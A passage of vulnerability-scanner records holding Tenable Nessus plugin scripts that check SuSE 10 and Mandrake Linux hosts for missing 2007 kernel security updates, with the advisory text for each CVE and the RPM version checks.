patches.arch/acpi_package_object_support.patch: ACPI\n package object as method parameter support (in AML)\n [#270956]\n\n - patches.fixes/ia64_cpufreq_PDC.patch: correctly assign\n as cpufreq capable driver (_PDC) to BIOS [#270973]\n\n - patches.arch/ia64-kdump-hpzx1-ioc-workaround: update to\n latest upstream version of the patch [#271158]\n\n - patches.suse/delayacct_memleak.patch: Fix delayacct\n memory leak [#271187]\n\n - patches.fixes/fc_transport-check-portstate-before-scan:\n check FC portstates before invoking target scan\n [#271338]\n\n - patches.fixes/unusual14cd.patch: quirk for 14cd:6600\n [#274087]\n\n -\n patches.fixes/reiserfs-change_generation_on_update_sd.di\n ff: fix assertion failure in reiserfs [#274288]\n\n -\n patches.drivers/d-link-dge-530t-should-use-the-skge-driv\n er.patch: D-Link DGE-530T should use the skge driver\n [#275376]\n\n - patches.arch/ia64-dont-unwind-running-tasks.patch: Only\n unwind non-running tasks [#275854]\n\n - patches.fixes/dm-mpath-rdac-avt-support: short circuit\n RDAC hardware handler in AVT mode [#277834]\n\n - patches.fixes/lkcd-re-enable-valid_phys_addr_range:\n re-enable the valid_phys_addr_range() check [#279433]\n\n - patches.drivers/cciss-panic-on-reboot: when root\n filesystem is xfs the server cannot do a second reboot\n [#279436] Also resolves same issue in [#291759].\n\n - patches.drivers/ide-hpt366-fix-302n-oops: fix hpt302n\n oops [#279705]\n\n - patches.fixes/serial-8250-backup-timer-2-deadlock-fix:\n fix possible deadlock [#280771]\n\n - patches.fixes/nfs-osync-error-return: ensure proper\n error return from O_SYNC writes [#280833]\n\n - patches.fixes/acpi_pci_hotplug_poweroff.patch: ACPI PCI\n hotplug driver acpiphp unable to power off PCI slot\n [#281234]\n\n -\n patches.drivers/pci-hotplug-acpiphp-remove-hot-plug-para\n meter-write-to-pci-host-bridge.patch: remove hot plug\n parameter write to PCI host bridge [#281239]\n\n - patches.fixes/scsi-set-correct-resid: Incorrect 'resid'\n field values when using a tape device [#281640]\n\n - patches.drivers/usb-edgeport-epic-support.patch: USB:\n add EPIC support to the io_edgeport driver [#281921]\n\n - patches.fixes/usb-hid-ncr-no-init-reports.patch: HID:\n Don't initialize reports for NCR devices [#281921]\n\n - patches.drivers/ppc-power6-ehea.patch: use decimal\n values in sysfs propery logical_port_id, fix panic when\n adding / removing logical eHEA ports [#283070]\n\n - patches.arch/ppc-power6-ebus.patch: DLPAR Adapter\n add/remove functionality for eHEA [#283239]\n\n - patches.fixes/nfs-enospc: Return ENOSPC and EDQUOT to\n NFS write requests more promptly [#284042]\n\n -\n patches.drivers/pci-hotplug-acpiphp-avoid-acpiphp-cannot\n -get-bridge-info-pci-hotplug-failure.patch: PCI:\n hotplug: acpiphp: avoid acpiphp 'cannot get bridge info'\n PCI hotplug failure [#286193]\n\n - patches.drivers/lpfc-8.1.10.9-update: lpfc update to\n 8.1.10.9 [#286223]\n\n - patches.fixes/make-swappiness-safer-to-use.patch: Handle\n low swappiness gracefully [#288799]\n\n - patches.arch/ppc-oprofile-power5plusplus.patch: oprofile\n support for Power 5++ [#289223]\n\n - patches.drivers/ppc-power6-ehea.patch: Fixed possible\n kernel panic on VLAN packet recv [#289301]\n\n - patches.fixes/igrab_should_check_for_i_clear.patch:\n igrab() should check for I_CLEAR [#289576]\n\n - patches.fixes/wait_for_sysfs_population.diff: Driver\n core: bus device event delay [#289964]\n\n -\n patches.drivers/scsi-throttle-SG_DXFER_TO_FROM_DEV-warni\n ng-better: better throttling of SG_DXFER_TO_FROM_DEV\n warning messages [#290117]\n\n -\n patches.arch/mark-unwind-info-for-signal-trampolines-in-\n vdsos.patch: Mark unwind info for signal trampolines in\n vDSOs [#291421]\n\n - patches.fixes/hugetlbfs-stack-grows-fix.patch: don't\n allow the stack to grow into hugetlb reserved regions\n [#294021]\n\n - patches.drivers/alsa-post-sp1-hda-analog-update: add\n support of of missing AD codecs [#294471]\n\n - patches.drivers/alsa-post-sp1-hda-conexant-fixes: fix\n unterminated arrays [#294480]\n\n - patches.fixes/fix_hpet_init_race.patch: fix a race in\n HPET initialization on x86_64 resulting in a lockup on\n boot [#295115]\n\n - patches.drivers/alsa-post-sp1-hda-sigmatel-pin-fix: Fix\n number of pin widgets with STAC codecs [#295653]\n\n -\n patches.fixes/pci-pcieport-driver-remove-invalid-warning\n -message.patch: PCI: pcieport-driver: remove invalid\n warning message [#297135] [#298561]\n\n - patches.kernel.org/patch-2.6.16.NN-$((NN+1)), NN =\n 18,...,52: update to Kernel 2.6.16.53; lots of bugfixes\n [#298719] [#186582] [#186583] [#186584]\n\n - patches.fixes/ocfs2-1.2-svn-r3027.diff: proactive patch\n [#298845]\n\n - patches.drivers/b44-phy-fix: Fix frequent PHY resets\n under load on b44 [#301653]\n\n - dd patches.arch/ppc-eeh-node-status-okay.patch firmware\n returns 'okay' instead of 'ok' for node status [#301788]", "edition": 25, "published": "2007-12-13T00:00:00", "title": "SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 4185)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2876", "CVE-2007-3848", "CVE-2007-3107", "CVE-2007-3851", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-2242", "CVE-2007-2453", "CVE-2007-2525"], "modified": "2007-12-13T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KERNEL-4185.NASL", "href": "https://www.tenable.com/plugins/nessus/29487", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(29487);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2242\", \"CVE-2007-2453\", \"CVE-2007-2525\", \"CVE-2007-2876\", \"CVE-2007-3105\", \"CVE-2007-3107\", \"CVE-2007-3513\", \"CVE-2007-3848\", \"CVE-2007-3851\");\n\n script_name(english:\"SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 4185)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This kernel update fixes the following security problems :\n\n - The IPv6 protocol allows remote attackers to cause a\n denial of service via crafted IPv6 type 0 route headers\n (IPV6_RTHDR_TYPE_0) that create network amplification\n between two routers. (CVE-2007-2242)\n\n The default is that RH0 is disabled now. To adjust this,\n write to the file /proc/net/accept_source_route6.\n\n - The random number feature in the Linux kernel 2.6 (1)\n did not properly seed pools when there is no entropy, or\n (2) used an incorrect cast when extracting entropy,\n which might have caused the random number generator to\n provide the same values after reboots on systems without\n an entropy source. (CVE-2007-2453)\n\n - A NULL pointer dereference in SCTP connection tracking\n could be caused by a remote attacker by sending\n specially crafted packets. Note that this requires SCTP\n set-up and active to be exploitable. (CVE-2007-2876)\n\n - Stack-based buffer overflow in the random number\n generator (RNG) implementation in the Linux kernel\n before 2.6.22 might allow local root users to cause a\n denial of service or gain privileges by setting the\n default wakeup threshold to a value greater than the\n output pool size, which triggers writing random numbers\n to the stack by the pool transfer function involving\n 'bound check ordering'. (CVE-2007-3105)\n\n Since this value can only be changed by a root user,\n exploitability is low.\n\n - The signal handling in the Linux kernel, when run on\n PowerPC systems using HTX, allows local users to cause a\n denial of service via unspecified vectors involving\n floating point corruption and concurrency.\n (CVE-2007-3107)\n\n - Memory leak in the PPP over Ethernet (PPPoE) socket\n implementation in the Linux kernel allowed local users\n to cause a denial of service (memory consumption) by\n creating a socket using connect, and releasing it before\n the PPPIOCGCHAN ioctl is initialized. (CVE-2007-2525)\n\n - The lcd_write function in drivers/usb/misc/usblcd.c in\n the Linux kernel did not limit the amount of memory used\n by a caller, which allowed local users to cause a denial\n of service (memory consumption). (CVE-2007-3513)\n\n - A local attacker could send a death signal to a setuid\n root program under certain conditions, potentially\n causing unwanted behaviour in this program.\n (CVE-2007-3848)\n\n - On machines with a Intel i965 based graphics card local\n users with access to the direct rendering devicenode\n could overwrite memory on the machine and so gain root\n privileges. (CVE-2007-3851)\n\n - Fixed a denial of service possibility where a local\n attacker with access to a pwc camera device could hang\n the USB subsystem. [#302194]\n\nand the following non security bugs :\n\n - patches.arch/ppc-oprofile-970mp.patch: enable ppc64/970\n MP, requires oprofile 0.9.3 [#252696]\n\n - patches.arch/x86_64-no-tsc-with-C3: don't use TSC on\n x86_64 Intel systems when CPU has C3 [#254061]\n\n - patches.arch/x86_64-hpet-lost-interrupts-fix.patch:\n backport x86_64 hpet lost interrupts code [#257035]\n\n - patches.fixes/fusion-nat-consumption-fix: handle a\n potential race in mptbase. This fixes a NaT consumption\n crash [#257412]\n\n - patches.arch/ia64-skip-clock-calibration: enabled\n [#259501]\n\n - patches.fixes/md-raid1-handle-read-error: Correctly\n handle read errors from a failed drive in raid1\n [#261459]\n\n - patches.arch/ia64-fix-kdump-on-init: kdump on INIT needs\n multi-nodes sync-up (v.2) [#265764]\n\n - patches.arch/ia64-perfmon-fix-2: race condition between\n pfm_context_create and pfm_read [#268131]\n\n - patches.fixes/cpufreq_ppc_boot_option.patch: workaround\n for _PPC (BIOS cpufreq limitations) [#269579]\n\n - patches.arch/acpi_package_object_support.patch: ACPI\n package object as method parameter support (in AML)\n [#270956]\n\n - patches.fixes/ia64_cpufreq_PDC.patch: correctly assign\n as cpufreq capable driver (_PDC) to BIOS [#270973]\n\n - patches.arch/ia64-kdump-hpzx1-ioc-workaround: update to\n latest upstream version of the patch [#271158]\n\n - patches.suse/delayacct_memleak.patch: Fix delayacct\n memory leak [#271187]\n\n - patches.fixes/fc_transport-check-portstate-before-scan:\n check FC portstates before invoking target scan\n [#271338]\n\n - patches.fixes/unusual14cd.patch: quirk for 14cd:6600\n [#274087]\n\n -\n patches.fixes/reiserfs-change_generation_on_update_sd.di\n ff: fix assertion failure in reiserfs [#274288]\n\n -\n patches.drivers/d-link-dge-530t-should-use-the-skge-driv\n er.patch: D-Link DGE-530T should use the skge driver\n [#275376]\n\n - patches.arch/ia64-dont-unwind-running-tasks.patch: Only\n unwind non-running tasks [#275854]\n\n - patches.fixes/dm-mpath-rdac-avt-support: short circuit\n RDAC hardware handler in AVT mode [#277834]\n\n - patches.fixes/lkcd-re-enable-valid_phys_addr_range:\n re-enable the valid_phys_addr_range() check [#279433]\n\n - patches.drivers/cciss-panic-on-reboot: when root\n filesystem is xfs the server cannot do a second reboot\n [#279436] Also resolves same issue in [#291759].\n\n - patches.drivers/ide-hpt366-fix-302n-oops: fix hpt302n\n oops [#279705]\n\n - patches.fixes/serial-8250-backup-timer-2-deadlock-fix:\n fix possible deadlock [#280771]\n\n - patches.fixes/nfs-osync-error-return: ensure proper\n error return from O_SYNC writes [#280833]\n\n - patches.fixes/acpi_pci_hotplug_poweroff.patch: ACPI PCI\n hotplug driver acpiphp unable to power off PCI slot\n [#281234]\n\n -\n patches.drivers/pci-hotplug-acpiphp-remove-hot-plug-para\n meter-write-to-pci-host-bridge.patch: remove hot plug\n parameter write to PCI host bridge [#281239]\n\n - patches.fixes/scsi-set-correct-resid: Incorrect 'resid'\n field values when using a tape device [#281640]\n\n - patches.drivers/usb-edgeport-epic-support.patch: USB:\n add EPIC support to the io_edgeport driver [#281921]\n\n - patches.fixes/usb-hid-ncr-no-init-reports.patch: HID:\n Don't initialize reports for NCR devices [#281921]\n\n - patches.drivers/ppc-power6-ehea.patch: use decimal\n values in sysfs propery logical_port_id, fix panic when\n adding / removing logical eHEA ports [#283070]\n\n - patches.arch/ppc-power6-ebus.patch: DLPAR Adapter\n add/remove functionality for eHEA [#283239]\n\n - patches.fixes/nfs-enospc: Return ENOSPC and EDQUOT to\n NFS write requests more promptly [#284042]\n\n -\n patches.drivers/pci-hotplug-acpiphp-avoid-acpiphp-cannot\n -get-bridge-info-pci-hotplug-failure.patch: PCI:\n hotplug: acpiphp: avoid acpiphp 'cannot get bridge info'\n PCI hotplug failure [#286193]\n\n - patches.drivers/lpfc-8.1.10.9-update: lpfc update to\n 8.1.10.9 [#286223]\n\n - patches.fixes/make-swappiness-safer-to-use.patch: Handle\n low swappiness gracefully [#288799]\n\n - patches.arch/ppc-oprofile-power5plusplus.patch: oprofile\n support for Power 5++ [#289223]\n\n - patches.drivers/ppc-power6-ehea.patch: Fixed possible\n kernel panic on VLAN packet recv [#289301]\n\n - patches.fixes/igrab_should_check_for_i_clear.patch:\n igrab() should check for I_CLEAR [#289576]\n\n - patches.fixes/wait_for_sysfs_population.diff: Driver\n core: bus device event delay [#289964]\n\n -\n patches.drivers/scsi-throttle-SG_DXFER_TO_FROM_DEV-warni\n ng-better: better throttling of SG_DXFER_TO_FROM_DEV\n warning messages [#290117]\n\n -\n patches.arch/mark-unwind-info-for-signal-trampolines-in-\n vdsos.patch: Mark unwind info for signal trampolines in\n vDSOs [#291421]\n\n - patches.fixes/hugetlbfs-stack-grows-fix.patch: don't\n allow the stack to grow into hugetlb reserved regions\n [#294021]\n\n - patches.drivers/alsa-post-sp1-hda-analog-update: add\n support of of missing AD codecs [#294471]\n\n - patches.drivers/alsa-post-sp1-hda-conexant-fixes: fix\n unterminated arrays [#294480]\n\n - patches.fixes/fix_hpet_init_race.patch: fix a race in\n HPET initialization on x86_64 resulting in a lockup on\n boot [#295115]\n\n - patches.drivers/alsa-post-sp1-hda-sigmatel-pin-fix: Fix\n number of pin widgets with STAC codecs [#295653]\n\n -\n patches.fixes/pci-pcieport-driver-remove-invalid-warning\n -message.patch: PCI: pcieport-driver: remove invalid\n warning message [#297135] [#298561]\n\n - patches.kernel.org/patch-2.6.16.NN-$((NN+1)), NN =\n 18,...,52: update to Kernel 2.6.16.53; lots of bugfixes\n [#298719] [#186582] [#186583] [#186584]\n\n - patches.fixes/ocfs2-1.2-svn-r3027.diff: proactive patch\n [#298845]\n\n - patches.drivers/b44-phy-fix: Fix frequent PHY resets\n under load on b44 [#301653]\n\n - dd patches.arch/ppc-eeh-node-status-okay.patch firmware\n returns 'okay' instead of 'ok' for node status [#301788]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-2242.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-2453.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-2525.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-2876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3105.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3107.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3513.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3848.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3851.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 4185.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-bigsmp-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-default-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-smp-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-source-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-syms-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-xen-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-xenpae-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-bigsmp-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-debug-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-default-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-kdump-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-smp-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-source-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-syms-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-xen-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-xenpae-2.6.16.53-0.8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-07T11:51:46", "description": "Some vulnerabilities were discovered and corrected in the Linux 2.6\nkernel :\n\nA stack-based buffer overflow in the random number generator could\nallow local root users to cause a denial of service or gain privileges\nby setting the default wakeup threshold to a value greater than the\noutput pool size (CVE-2007-3105).\n\nThe lcd_write function did not limit the amount of memory used by a\ncaller, which allows local users to cause a denial of service (memory\nconsumption) (CVE-2007-3513).\n\nThe decode_choice function allowed remote attackers to cause a denial\nof service (crash) via an encoded out-of-range index value for a\nchoice field which triggered a NULL pointer dereference\n(CVE-2007-3642).\n\nThe Linux kernel allowed local users to send arbitrary signals to a\nchild process that is running at higher privileges by causing a\nsetuid-root parent process to die which delivered an\nattacker-controlled parent process death signal (PR_SET_PDEATHSIG)\n(CVE-2007-3848).\n\nThe aac_cfg_openm and aac_compat_ioctl functions in the SCSI layer\nioctl patch in aacraid did not check permissions for ioctls, which\nmight allow local users to cause a denial of service or gain\nprivileges (CVE-2007-4308).\n\nThe IA32 system call emulation functionality, when running on the\nx86_64 architecture, did not zero extend the eax register after the\n32bit entry path to ptrace is used, which could allow local users to\ngain privileges by triggering an out-of-bounds access to the system\ncall table using the %RAX register (CVE-2007-4573).\n\nIn addition to these security fixes, other fixes have been included\nsuch as :\n\n - More NVidia PCI ids wre added\n\n - The 3w-9xxx module was updated to version 2.26.02.010\n\n - Fixed the map entry for ICH8\n\n - Added the TG3 5786 PCI id\n\n - Reduced the log verbosity of cx88-mpeg\n\nTo update your kernel, please follow the directions located at :\n\nhttp://www.mandriva.com/en/security/kernelupdate", "edition": 26, "published": "2007-10-25T00:00:00", "title": "Mandrake Linux Security Advisory : kernel (MDKSA-2007:195)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4573", "CVE-2007-3848", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-4308", "CVE-2007-3642"], "modified": "2007-10-25T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:kernel-2.6.17.16mdv", "cpe:/o:mandriva:linux:2007", "p-cpe:/a:mandriva:linux:kernel-xenU-latest", "p-cpe:/a:mandriva:linux:kernel-latest", "p-cpe:/a:mandriva:linux:kernel-xen0-2.6.17.16mdv", "cpe:/o:mandriva:linux:2007.1", "p-cpe:/a:mandriva:linux:kernel-legacy-latest", "p-cpe:/a:mandriva:linux:kernel-legacy-2.6.17.16mdv", "p-cpe:/a:mandriva:linux:kernel-source-latest", "p-cpe:/a:mandriva:linux:kernel-xen0-latest", "p-cpe:/a:mandriva:linux:kernel-source-stripped-2.6.17.16mdv", "p-cpe:/a:mandriva:linux:kernel-xenU-2.6.17.16mdv", "p-cpe:/a:mandriva:linux:kernel-source-2.6.17.16mdv", "p-cpe:/a:mandriva:linux:kernel-doc-latest", "p-cpe:/a:mandriva:linux:kernel-source-stripped-latest", "p-cpe:/a:mandriva:linux:kernel-enterprise-2.6.17.16mdv", "p-cpe:/a:mandriva:linux:kernel-doc-2.6.17.16mdv", "p-cpe:/a:mandriva:linux:kernel-enterprise-latest"], "id": "MANDRAKE_MDKSA-2007-195.NASL", "href": "https://www.tenable.com/plugins/nessus/27561", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2007:195. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(27561);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2007-3105\", \"CVE-2007-3513\", \"CVE-2007-3642\", \"CVE-2007-3848\", \"CVE-2007-4308\", \"CVE-2007-4573\");\n script_bugtraq_id(24734, 25216, 25348, 25387, 25774);\n script_xref(name:\"MDKSA\", value:\"2007:195\");\n\n script_name(english:\"Mandrake Linux Security Advisory : kernel (MDKSA-2007:195)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Some vulnerabilities were discovered and corrected in the Linux 2.6\nkernel :\n\nA stack-based buffer overflow in the random number generator could\nallow local root users to cause a denial of service or gain privileges\nby setting the default wakeup threshold to a value greater than the\noutput pool size (CVE-2007-3105).\n\nThe lcd_write function did not limit the amount of memory used by a\ncaller, which allows local users to cause a denial of service (memory\nconsumption) (CVE-2007-3513).\n\nThe decode_choice function allowed remote attackers to cause a denial\nof service (crash) via an encoded out-of-range index value for a\nchoice field which triggered a NULL pointer dereference\n(CVE-2007-3642).\n\nThe Linux kernel allowed local users to send arbitrary signals to a\nchild process that is running at higher privileges by causing a\nsetuid-root parent process to die which delivered an\nattacker-controlled parent process death signal (PR_SET_PDEATHSIG)\n(CVE-2007-3848).\n\nThe aac_cfg_openm and aac_compat_ioctl functions in the SCSI layer\nioctl patch in aacraid did not check permissions for ioctls, which\nmight allow local users to cause a denial of service or gain\nprivileges (CVE-2007-4308).\n\nThe IA32 system call emulation functionality, when running on the\nx86_64 architecture, did not zero extend the eax register after the\n32bit entry path to ptrace is used, which could allow local users to\ngain privileges by triggering an out-of-bounds access to the system\ncall table using the %RAX register (CVE-2007-4573).\n\nIn addition to these security fixes, other fixes have been included\nsuch as :\n\n - More NVidia PCI ids wre added\n\n - The 3w-9xxx module was updated to version 2.26.02.010\n\n - Fixed the map entry for ICH8\n\n - Added the TG3 5786 PCI id\n\n - Reduced the log verbosity of cx88-mpeg\n\nTo update your kernel, please follow the directions located at :\n\nhttp://www.mandriva.com/en/security/kernelupdate\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-2.6.17.16mdv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-doc-2.6.17.16mdv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-doc-latest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-enterprise-2.6.17.16mdv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-enterprise-latest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-latest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-legacy-2.6.17.16mdv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-legacy-latest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source-2.6.17.16mdv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source-latest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source-stripped-2.6.17.16mdv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-source-stripped-latest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-xen0-2.6.17.16mdv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-xen0-latest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-xenU-2.6.17.16mdv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:kernel-xenU-latest\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2007.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2007.0\", reference:\"kernel-2.6.17.16mdv-1-1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"kernel-doc-2.6.17.16mdv-1-1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"kernel-enterprise-2.6.17.16mdv-1-1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", cpu:\"i386\", reference:\"kernel-legacy-2.6.17.16mdv-1-1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"kernel-source-2.6.17.16mdv-1-1mdv2007.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2007.0\", reference:\"kernel-source-stripped-2.6.17.16mdv-1-1mdv2007.0\", yank:\"mdv\")) flag++;\nif 